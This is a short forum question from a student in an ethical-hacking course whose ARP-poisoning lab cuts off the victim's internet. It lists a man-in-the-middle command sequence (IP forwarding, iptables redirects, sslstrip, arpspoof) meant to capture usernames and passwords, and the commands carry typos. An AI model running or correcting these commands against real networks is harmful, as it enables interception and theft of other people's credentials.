# ARP poisoning command slows down victim internet and victim has no access

Tags: linux, kali-linux, arp-spoofing, arp

im currently enrolled in a CPEH course my 3rd lab was arp poison. command i used is

```
 echo -1 > /proc/sys/met/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --detination-port 80 -j REDIRECT --to-   port 1000
did same for 443 protocol
sslstrip -p -l 1000
arpspoof -i eth0 -t victim ip Gateway
tail -f sslstrip.log
```

what am i doing wrong. once i do the arpspoof victim cant connect to net anymore

Comment: > What am I doing wrong?

Well, what are you trying to accomplish, first.

Comment: trying to complete my lab practice. which is i have to get the username and passwords using man in the middle attack. but while using this the victim loses internet connection of some sort